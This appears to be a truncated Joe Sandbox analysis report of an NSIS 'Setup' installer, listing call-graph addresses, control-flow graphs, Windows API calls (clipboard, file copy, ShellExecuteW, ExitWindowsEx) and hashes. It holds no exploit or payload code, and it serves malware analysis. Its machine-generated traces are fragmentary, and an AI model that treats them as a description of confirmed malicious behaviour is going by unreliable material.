4984->4986 4987 407254 4985->4987 4988 40725a lstrcpynW 4985->4988 4987->4988 4988->4986 4059 402713 4074 406009 lstrcpynW 4059->4074 4061 40272c 4075 406009 lstrcpynW 4061->4075 4063 402738 4064 40145c 18 API calls 4063->4064 4066 402743 4063->4066 4064->4066 4065 402752 4068 40145c 18 API calls 4065->4068 4070 402761 4065->4070 4066->4065 4067 40145c 18 API calls 4066->4067 4067->4065 4068->4070 4069 40145c 18 API calls 4071 40276b 4069->4071 4070->4069 4072 4062a3 11 API calls 4071->4072 4073 40277f WritePrivateProfileStringW 4072->4073 4074->4061 4075->4063 4989 402797 4990 40145c 18 API calls 4989->4990 4991 4027ae 4990->4991 4992 40145c 18 API calls 4991->4992 4993 4027b7 4992->4993 4994 40145c 18 API calls 4993->4994 4995 4027c0 GetPrivateProfileStringW lstrcmpW 4994->4995 4996 402e18 4997 40145c 18 API calls 4996->4997 4998 402e1f FindFirstFileW 4997->4998 4999 402e32 4998->4999 5004 405f51 wsprintfW 4999->5004 5001 402e43 5005 406009 lstrcpynW 5001->5005 5003 402e50 5004->5001 5005->5003 5006 401e9a 5007 40145c 18 API calls 5006->5007 5008 401ea1 5007->5008 5009 401446 18 API calls 5008->5009 5010 401eab wsprintfW 5009->5010 4286 401a1f 4287 40145c 18 API calls 4286->4287 4288 401a26 4287->4288 4289 4062a3 11 API calls 4288->4289 4290 401a49 4289->4290 4291 401a64 4290->4291 4292 401a5c 4290->4292 4340 406009 lstrcpynW 4291->4340 4339 406009 lstrcpynW 4292->4339 4295 401a62 4299 406038 5 API calls 4295->4299 4296 401a6f 4297 406722 3 API calls 4296->4297 4298 401a75 lstrcatW 4297->4298 4298->4295 4301 401a81 4299->4301 4300 4062d5 2 API calls 4300->4301 4301->4300 4302 405e30 2 API calls 4301->4302 4304 401a98 CompareFileTime 4301->4304 4305 401ba9 4301->4305 4309 4062a3 11 API calls 4301->4309 4313 406009 lstrcpynW 4301->4313 4319 406805 18 API calls 4301->4319 4326 405ca0 MessageBoxIndirectW 4301->4326 4330 401b50 4301->4330 4337 401b5d 4301->4337 4338 405e50 GetFileAttributesW CreateFileW 4301->4338 4302->4301 4304->4301 4306 404f72 25 API calls 4305->4306 4308 401bb3 4306->4308 4307 404f72 25 API calls 4310 401b70 4307->4310 4311 40337f 37 API calls 4308->4311 4309->4301 4314 4062a3 11 API calls 4310->4314 4312 401bc6 4311->4312 4315 4062a3 11 API calls 4312->4315 4313->4301 4321 401b8b 4314->4321 4316 401bda 4315->4316 4317 401be9 SetFileTime 4316->4317 4318 401bf8 CloseHandle 4316->4318 4317->4318 4320 401c09 4318->4320 4318->4321 4319->4301 4322 401c21 4320->4322 4323 401c0e 4320->4323 4325 406805 18 API calls 4322->4325 4324 406805 18 API calls 4323->4324 4327 401c16 lstrcatW 4324->4327 4328 401c29 4325->4328 4326->4301 4327->4328 4329 4062a3 11 API calls 4328->4329 4331 401c34 4329->4331 4332 401b93 4330->4332 4333 401b53 4330->4333 4334 405ca0 MessageBoxIndirectW 4331->4334 4335 4062a3 11 API calls 4332->4335 4336 4062a3 11 API calls 4333->4336 4334->4321 4335->4321 4336->4337 4337->4307 4338->4301 4339->4295 4340->4296 5011 40209f GetDlgItem GetClientRect 5012 40145c 18 API calls 5011->5012 5013 4020cf LoadImageW SendMessageW 5012->5013 5014 4030e3 5013->5014 5015 4020ed DeleteObject 5013->5015 5015->5014 5016 402b9f 5017 401446 18 API calls 5016->5017 5022 402ba7 5017->5022 5018 402c4a 5019 402bdf ReadFile 5021 402c3d 5019->5021 5019->5022 5020 401446 18 API calls 5020->5021 5021->5018 5021->5020 5028 402d17 ReadFile 5021->5028 5022->5018 5022->5019 5022->5021 5023 402c06 MultiByteToWideChar 5022->5023 5024 402c3f 5022->5024 5026 402c4f 5022->5026 5023->5022 5023->5026 5029 405f51 wsprintfW 5024->5029 5026->5021 5027 402c6b SetFilePointer 5026->5027 5027->5021 5028->5021 5029->5018 5030 402b23 GlobalAlloc 5031 402b39 5030->5031 5032 402b4b 5030->5032 5033 401446 18 API calls 5031->5033 5034 40145c 18 API calls 5032->5034 5035 402b41 5033->5035 5036 402b52 WideCharToMultiByte lstrlenA 5034->5036 5037 402b93 5035->5037 5038 402b84 WriteFile 5035->5038 5036->5035 5038->5037 5039 402384 GlobalFree 5038->5039 5039->5037 5041 4044a5 5042 404512 5041->5042 5043 4044df 5041->5043 5045 40451f GetDlgItem GetAsyncKeyState 5042->5045 5052 4045b1 5042->5052 5109 405c84 GetDlgItemTextW 5043->5109 5048 40453e GetDlgItem 5045->5048 5055 40455c 5045->5055 5046 4044ea 5049 406038 5 API calls 5046->5049 5047 40469d 5107 404833 5047->5107 5111 405c84 GetDlgItemTextW 5047->5111 5050 403d3f 19 API calls 5048->5050 5051 4044f0 5049->5051 5054 404551 ShowWindow 5050->5054 5057 403e74 5 API calls 5051->5057 5052->5047 5058 406805 18 API calls 5052->5058 5052->5107 5054->5055 5060 404579 SetWindowTextW 5055->5060 5065 405d59 4 API calls 5055->5065 5056 403dca 8 API calls 5061 404847 5056->5061 5062 4044f5 GetDlgItem 5057->5062 5063 40462f SHBrowseForFolderW 5058->5063 5059 4046c9 5064 40677e 18 API calls 5059->5064 5066 403d3f 19 API calls 5060->5066 5067 404503 IsDlgButtonChecked 5062->5067 5062->5107 5063->5047 5068 404647 CoTaskMemFree 5063->5068 5069 4046cf 5064->5069 5070 40456f 5065->5070 5071 404597 5066->5071 5067->5042 5072 406722 3 API calls 5068->5072 5112 406009 lstrcpynW 5069->5112 5070->5060 5076 406722 3 API calls 5070->5076 5073 403d3f 19 API calls 5071->5073 5074 404654 5072->5074 5077 4045a2 5073->5077 5078 40468b SetDlgItemTextW 5074->5078 5083 406805 18 API calls 5074->5083 5076->5060 5110 403d98 SendMessageW 5077->5110 5078->5047 5079 4046e6 5081 4062fc 3 API calls 5079->5081 5090 4046ee 5081->5090 5082 4045aa 5086 4062fc 3 API calls 5082->5086 5084 404673 lstrcmpiW 5083->5084 5084->5078 5087 404684 lstrcatW 5084->5087 5085 404730 5113 406009 lstrcpynW 5085->5113 5086->5052 5087->5078 5089 404739 5091 405d59 4 API calls 5089->5091 5090->5085 5095 406751 2 API calls 5090->5095 5096 404785 5090->5096 5092 40473f GetDiskFreeSpaceW 5091->5092 5094 404763 MulDiv 5092->5094 5092->5096 5094->5096 5095->5090 5098 4047e2 5096->5098 5099 4043ad 21 API calls 5096->5099 5097 404805 5114 403d85 KiUserCallbackDispatcher 5097->5114 5098->5097 5100 40141d 80 API calls 5098->5100 5101 4047d3 5099->5101 5100->5097 5103 4047e4 SetDlgItemTextW 5101->5103 5104 4047d8 5101->5104 5103->5098 5105 4043ad 21 API calls 5104->5105 5105->5098 5106 404821 5106->5107 5115 403d61 5106->5115 5107->5056 5109->5046 5110->5082 5111->5059 5112->5079 5113->5089 5114->5106 5116 403d74 SendMessageW 5115->5116 5117 403d6f 5115->5117 5116->5107 5117->5116 5118 402da5 5119 4030e3 5118->5119 5120 402dac 5118->5120 5121 401446 18 API calls 5120->5121 5122 402db8 5121->5122 5123 402dbf SetFilePointer 5122->5123 5123->5119 5124 402dcf 5123->5124 5124->5119 5126 405f51 wsprintfW 5124->5126 5126->5119 5127 4030a9 SendMessageW 5128 4030c2 InvalidateRect 5127->5128 5129 4030e3 5127->5129 5128->5129 5130 401cb2 5131 40145c 18 API calls 5130->5131 5132 401c54 5131->5132 5133 4062a3 11 API calls 5132->5133 5136 401c64 5132->5136 5134 401c59 5133->5134 5135 406c9b 81 API calls 5134->5135 5135->5136 4086 4021b5 4087 40145c 18 API calls 4086->4087 4088 4021bb 4087->4088 4089 40145c 18 API calls 4088->4089 4090 4021c4 4089->4090 4091 40145c 18 API calls 4090->4091 4092 4021cd 4091->4092 4093 40145c 18 API calls 4092->4093 4094 4021d6 4093->4094 4095 404f72 25 API calls 4094->4095 4096 4021e2 ShellExecuteW 4095->4096 4097 40221b 4096->4097 4098 40220d 4096->4098 4100 4062a3 11 API calls 4097->4100 4099 4062a3 11 API calls 4098->4099 4099->4097 4101 402230 4100->4101 5144 402238 5145 40145c 18 API calls 5144->5145 5146 40223e 5145->5146 5147 4062a3 11 API calls 5146->5147 5148 40224b 5147->5148 5149 404f72 25 API calls 5148->5149 5150 402255 5149->5150 5151 405c3f 2 API calls 5150->5151 5152 40225b 5151->5152 5153 4062a3 11 API calls 5152->5153 5156 4022ac CloseHandle 5152->5156 5159 40226d 5153->5159 5155 4030e3 5156->5155 5157 402283 WaitForSingleObject 5158 402291 GetExitCodeProcess 5157->5158 5157->5159 5158->5156 5161 4022a3 5158->5161 5159->5156 5159->5157 5160 406332 2 API calls 5159->5160 5160->5157 5163 405f51 wsprintfW 5161->5163 5163->5156 5164 4040b8 5165 4040d3 5164->5165 5173 404201 5164->5173 5169 40410e 5165->5169 5195 403fca WideCharToMultiByte 5165->5195 5166 40426c 5167 404276 GetDlgItem 5166->5167 5168 40433e 5166->5168 5170 404290 5167->5170 5171 4042ff 5167->5171 5174 403dca 8 API calls 5168->5174 5176 403d3f 19 API calls 5169->5176 5170->5171 5179 4042b6 6 API calls 5170->5179 5171->5168 5180 404311 5171->5180 5173->5166 5173->5168 5175 40423b GetDlgItem SendMessageW 5173->5175 5178 404339 5174->5178 5200 403d85 KiUserCallbackDispatcher 5175->5200 5177 40414e 5176->5177 5182 403d3f 19 API calls 5177->5182 5179->5171 5183 404327 5180->5183 5184 404317 SendMessageW 5180->5184 5187 40415b CheckDlgButton 5182->5187 5183->5178 5188 40432d SendMessageW 5183->5188 5184->5183 5185 404267 5186 403d61 SendMessageW 5185->5186 5186->5166 5198 403d85 KiUserCallbackDispatcher 5187->5198 5188->5178 5190 404179 GetDlgItem 5199 403d98 SendMessageW 5190->5199 5192 40418f SendMessageW 5193 4041b5 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5192->5193 5194 4041ac GetSysColor 5192->5194 5193->5178 5194->5193 5196 404007 5195->5196 5197 403fe9 GlobalAlloc WideCharToMultiByte 5195->5197 5196->5169 5197->5196 5198->5190 5199->5192 5200->5185 4195 401eb9 4196 401f24 4195->4196 4197 401ec6 4195->4197 4198 401f53 GlobalAlloc 4196->4198 4199 401f28 4196->4199 4200 401ed5 4197->4200 4207 401ef7 4197->4207 4201 406805 18 API calls 4198->4201 4206 4062a3 11 API calls 4199->4206 4211 401f36 4199->4211 4202 4062a3 11 API calls 4200->4202 4205 401f46 4201->4205 4203 401ee2 4202->4203 4208 402708 4203->4208 4213 406805 18 API calls 4203->4213 4205->4208 4209 402387 GlobalFree 4205->4209 4206->4211 4217 406009 lstrcpynW 4207->4217 4209->4208 4219 406009 lstrcpynW 4211->4219 4212 401f06 4218 406009 lstrcpynW 4212->4218 4213->4203 4215 401f15 4220 406009 lstrcpynW 4215->4220 4217->4212 4218->4215 4219->4205 4220->4208 5201 4074bb 5203 407344 5201->5203 5202 407c6d 5203->5202 5204 4073c2 GlobalFree 5203->5204 5205 4073cb GlobalAlloc 5203->5205 5206 407443 GlobalAlloc 5203->5206 5207 40743a GlobalFree 5203->5207 5204->5205 5205->5202 5205->5203 5206->5202 5206->5203 5207->5206

                                                                                                                                                                                                                                                                Executed Functions

                                                                                                                                                                                                                                                                Function 004050CD Relevance: 68.5, APIs: 36, Strings: 3, Instructions: 295windowclipboardmemoryCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 0 4050cd-4050e8 1 405295-40529c 0->1 2 4050ee-4051d5 GetDlgItem * 3 call 403d98 call 404476 call 406805 call 4062a3 GetClientRect GetSystemMetrics SendMessageW * 2 0->2 3 4052c6-4052d3 1->3 4 40529e-4052c0 GetDlgItem CreateThread CloseHandle 1->4 35 4051f3-4051f6 2->35 36 4051d7-4051f1 SendMessageW * 2 2->36 6 4052f4-4052fb 3->6 7 4052d5-4052de 3->7 4->3 11 405352-405356 6->11 12 4052fd-405303 6->12 9 4052e0-4052ef ShowWindow * 2 call 403d98 7->9 10 405316-40531f call 403dca 7->10 9->6 22 405324-405328 10->22 11->10 14 405358-40535b 11->14 16 405305-405311 call 403d18 12->16 17 40532b-40533b ShowWindow 12->17 14->10 20 40535d-405370 SendMessageW 14->20 16->10 23 40534b-40534d call 403d18 17->23 24 40533d-405346 call 404f72 17->24 27 405376-405397 CreatePopupMenu call 406805 AppendMenuW 20->27 28 40528e-405290 20->28 23->11 24->23 37 405399-4053aa GetWindowRect 27->37 38 4053ac-4053b2 27->38 28->22 39 405206-40521d call 403d3f 35->39 40 4051f8-405204 SendMessageW 35->40 36->35 41 4053b3-4053cb TrackPopupMenu 37->41 38->41 46 405253-405274 GetDlgItem SendMessageW 39->46 47 40521f-405233 ShowWindow 39->47 40->39 41->28 43 4053d1-4053e8 41->43 45 4053ed-405408 SendMessageW 43->45 45->45 48 40540a-40542d OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 45->48 46->28 51 405276-40528c SendMessageW * 2 46->51 49 405242 47->49 50 405235-405240 ShowWindow 47->50 52 40542f-405458 SendMessageW 48->52 53 405248-40524e call 403d98 49->53 50->53 51->28 52->52 54 40545a-405474 GlobalUnlock SetClipboardData CloseClipboard 52->54 53->46 54->28
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,00000403), ref: 0040512F
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003EE), ref: 0040513E
                                                                                                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 00405196
                                                                                                                                                                                                                                                                • GetSystemMetrics.USER32(00000015), ref: 0040519E
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051BF
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051D0
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004051E3
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004051F1
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405204
                                                                                                                                                                                                                                                                • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405226
                                                                                                                                                                                                                                                                • ShowWindow.USER32(?,00000008), ref: 0040523A
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003EC), ref: 0040525B
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040526B
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405280
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 0040528C
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003F8), ref: 0040514D
                                                                                                                                                                                                                                                                  • Part of subcall function 00403D98: SendMessageW.USER32(00000028,?,00000001,004057B4), ref: 00403DA6
                                                                                                                                                                                                                                                                  • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                                                                                                                                                                                                                  • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                                                                                                                                                                                  • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003EC), ref: 004052AB
                                                                                                                                                                                                                                                                • CreateThread.KERNELBASE(00000000,00000000,Function_00005047,00000000), ref: 004052B9
                                                                                                                                                                                                                                                                • CloseHandle.KERNELBASE(00000000), ref: 004052C0
                                                                                                                                                                                                                                                                • ShowWindow.USER32(00000000), ref: 004052E7
                                                                                                                                                                                                                                                                • ShowWindow.USER32(?,00000008), ref: 004052EC
                                                                                                                                                                                                                                                                • ShowWindow.USER32(00000008), ref: 00405333
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405365
                                                                                                                                                                                                                                                                • CreatePopupMenu.USER32 ref: 00405376
                                                                                                                                                                                                                                                                • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 0040538B
                                                                                                                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 0040539E
                                                                                                                                                                                                                                                                • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053C0
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001073,00000000,?), ref: 004053FB
                                                                                                                                                                                                                                                                • OpenClipboard.USER32(00000000), ref: 0040540B
                                                                                                                                                                                                                                                                • EmptyClipboard.USER32 ref: 00405411
                                                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 0040541D
                                                                                                                                                                                                                                                                • GlobalLock.KERNEL32(00000000), ref: 00405427
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001073,00000000,?), ref: 0040543B
                                                                                                                                                                                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 0040545D
                                                                                                                                                                                                                                                                • SetClipboardData.USER32(0000000D,00000000), ref: 00405468
                                                                                                                                                                                                                                                                • CloseClipboard.USER32 ref: 0040546E
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2044944439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044932928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044969117.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2045164640.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
                                                                                                                                                                                                                                                                • String ID: @rD$New install of "%s" to "%s"${
                                                                                                                                                                                                                                                                • API String ID: 2110491804-2409696222
                                                                                                                                                                                                                                                                • Opcode ID: 71b8ecf663d6f058a1c3ced55927feebbdcf1e8b0d86afd2c4b352cd48bee751
                                                                                                                                                                                                                                                                • Instruction ID: 480b9f2609884c7685ddca5963e0cfcc77f9e358d06567921943d8ab7e89b76b
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 71b8ecf663d6f058a1c3ced55927feebbdcf1e8b0d86afd2c4b352cd48bee751
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 14B15B70800608FFDB11AFA0DD85EAE7B79EF44355F00803AFA45BA1A0CBB49A519F59
                                                                                                                                                                                                                                                                Function 00403883 Relevance: 54.6, APIs: 22, Strings: 9, Instructions: 304filestringcomCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 305 403883-403919 #17 SetErrorMode OleInitialize call 4062fc SHGetFileInfoW call 406009 GetCommandLineW call 406009 GetModuleHandleW 312 403923-403937 call 405d06 CharNextW 305->312 313 40391b-40391e 305->313 316 4039ca-4039d0 312->316 313->312 317 4039d6 316->317 318 40393c-403942 316->318 319 4039f5-403a0d GetTempPathW call 4037cc 317->319 320 403944-40394a 318->320 321 40394c-403950 318->321 328 403a33-403a4d DeleteFileW call 403587 319->328 329 403a0f-403a2d GetWindowsDirectoryW lstrcatW call 4037cc 319->329 320->320 320->321 323 403952-403957 321->323 324 403958-40395c 321->324 323->324 326 4039b8-4039c5 call 405d06 324->326 327 40395e-403965 324->327 326->316 342 4039c7 326->342 331 403967-40396e 327->331 332 40397a-40398c call 403800 327->332 345 403acc-403adb call 403859 CoUninitialize 328->345 346 403a4f-403a55 328->346 329->328 329->345 333 403970-403973 331->333 334 403975 331->334 343 4039a1-4039b6 call 403800 332->343 344 40398e-403995 332->344 333->332 333->334 334->332 342->316 343->326 361 4039d8-4039f0 call 407d6e call 406009 343->361 348 403997-40399a 344->348 349 40399c 344->349 359 403ae1-403af1 call 405ca0 ExitProcess 345->359 360 403bce-403bd4 345->360 351 403ab5-403abc call 40592c 346->351 352 403a57-403a60 call 405d06 346->352 348->343 348->349 349->343 358 403ac1-403ac7 call 4060e7 351->358 362 403a79-403a7b 352->362 358->345 365 403c51-403c59 360->365 366 403bd6-403bf3 call 4062fc * 3 360->366 361->319 370 403a62-403a74 call 403800 362->370 371 403a7d-403a87 362->371 372 403c5b 365->372 373 403c5f 365->373 397 403bf5-403bf7 366->397 398 403c3d-403c48 ExitWindowsEx 366->398 370->371 384 403a76 370->384 378 403af7-403b11 lstrcatW lstrcmpiW 371->378 379 403a89-403a99 call 40677e 371->379 372->373 378->345 383 403b13-403b29 CreateDirectoryW SetCurrentDirectoryW 378->383 379->345 390 403a9b-403ab1 call 406009 * 2 379->390 387 403b36-403b56 call 406009 * 2 383->387 388 403b2b-403b31 call 406009 383->388 384->362 404 403b5b-403b77 call 406805 DeleteFileW 387->404 388->387 390->351 397->398 402 403bf9-403bfb 397->402 398->365 401 403c4a-403c4c call 40141d 398->401 401->365 402->398 406 403bfd-403c0f GetCurrentProcess 402->406 412 403bb8-403bc0 404->412 413 403b79-403b89 CopyFileW 404->413 406->398 411 403c11-403c33 406->411 411->398 412->404 414 403bc2-403bc9 call 406c68 412->414 413->412 415 403b8b-403bab call 406c68 call 406805 call 405c3f 413->415 414->345 415->412 425 403bad-403bb4 CloseHandle 415->425 425->412
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • #17.COMCTL32 ref: 004038A2
                                                                                                                                                                                                                                                                • SetErrorMode.KERNELBASE(00008001), ref: 004038AD
                                                                                                                                                                                                                                                                • OleInitialize.OLE32(00000000), ref: 004038B4
                                                                                                                                                                                                                                                                  • Part of subcall function 004062FC: GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                                                                                                                                                                                                                                                  • Part of subcall function 004062FC: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                                                                                                                                                                                                                                                  • Part of subcall function 004062FC: GetProcAddress.KERNEL32(00000000), ref: 00406327
                                                                                                                                                                                                                                                                • SHGetFileInfoW.SHELL32(00409264,00000000,?,000002B4,00000000), ref: 004038DC
                                                                                                                                                                                                                                                                  • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                                                                                                                                                                                                                • GetCommandLineW.KERNEL32(0046ADC0,NSIS Error), ref: 004038F1
                                                                                                                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000,004C30A0,00000000), ref: 00403904
                                                                                                                                                                                                                                                                • CharNextW.USER32(00000000,004C30A0,00000020), ref: 0040392B
                                                                                                                                                                                                                                                                • GetTempPathW.KERNEL32(00002004,004D70C8,00000000,00000020), ref: 00403A00
                                                                                                                                                                                                                                                                • GetWindowsDirectoryW.KERNEL32(004D70C8,00001FFF), ref: 00403A15
                                                                                                                                                                                                                                                                • lstrcatW.KERNEL32(004D70C8,\Temp), ref: 00403A21
                                                                                                                                                                                                                                                                • DeleteFileW.KERNELBASE(004D30C0), ref: 00403A38
                                                                                                                                                                                                                                                                • CoUninitialize.COMBASE(?), ref: 00403AD1
                                                                                                                                                                                                                                                                • ExitProcess.KERNEL32 ref: 00403AF1
                                                                                                                                                                                                                                                                • lstrcatW.KERNEL32(004D70C8,~nsu.tmp), ref: 00403AFD
                                                                                                                                                                                                                                                                • lstrcmpiW.KERNEL32(004D70C8,004CF0B8,004D70C8,~nsu.tmp), ref: 00403B09
                                                                                                                                                                                                                                                                • CreateDirectoryW.KERNEL32(004D70C8,00000000), ref: 00403B15
                                                                                                                                                                                                                                                                • SetCurrentDirectoryW.KERNEL32(004D70C8), ref: 00403B1C
                                                                                                                                                                                                                                                                • DeleteFileW.KERNEL32(004331E8,004331E8,?,00477008,00409204,00473000,?), ref: 00403B6D
                                                                                                                                                                                                                                                                • CopyFileW.KERNEL32(004DF0D8,004331E8,00000001), ref: 00403B81
                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,004331E8,004331E8,?,004331E8,00000000), ref: 00403BAE
                                                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C04
                                                                                                                                                                                                                                                                • ExitWindowsEx.USER32(00000002,00000000), ref: 00403C40
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2044944439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044932928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044969117.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2045164640.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                                                                                                                                                                                                                                                                • String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp$1C
                                                                                                                                                                                                                                                                • API String ID: 2435955865-239407132
                                                                                                                                                                                                                                                                • Opcode ID: 5d9024d5f0e899f809313532158b428341dd342d07cfae74060de4bd372621f4
                                                                                                                                                                                                                                                                • Instruction ID: 7cf1fa831aca86d96b8495533088dbe4cf0b0326274ef0a42366eb07f7c747b9
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5d9024d5f0e899f809313532158b428341dd342d07cfae74060de4bd372621f4
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C4A1B671544305BAD6207F629D4AF1B3EACAF0070AF15483FF585B61D2DBBC8A448B6E
                                                                                                                                                                                                                                                                Function 00406805 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 212stringCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
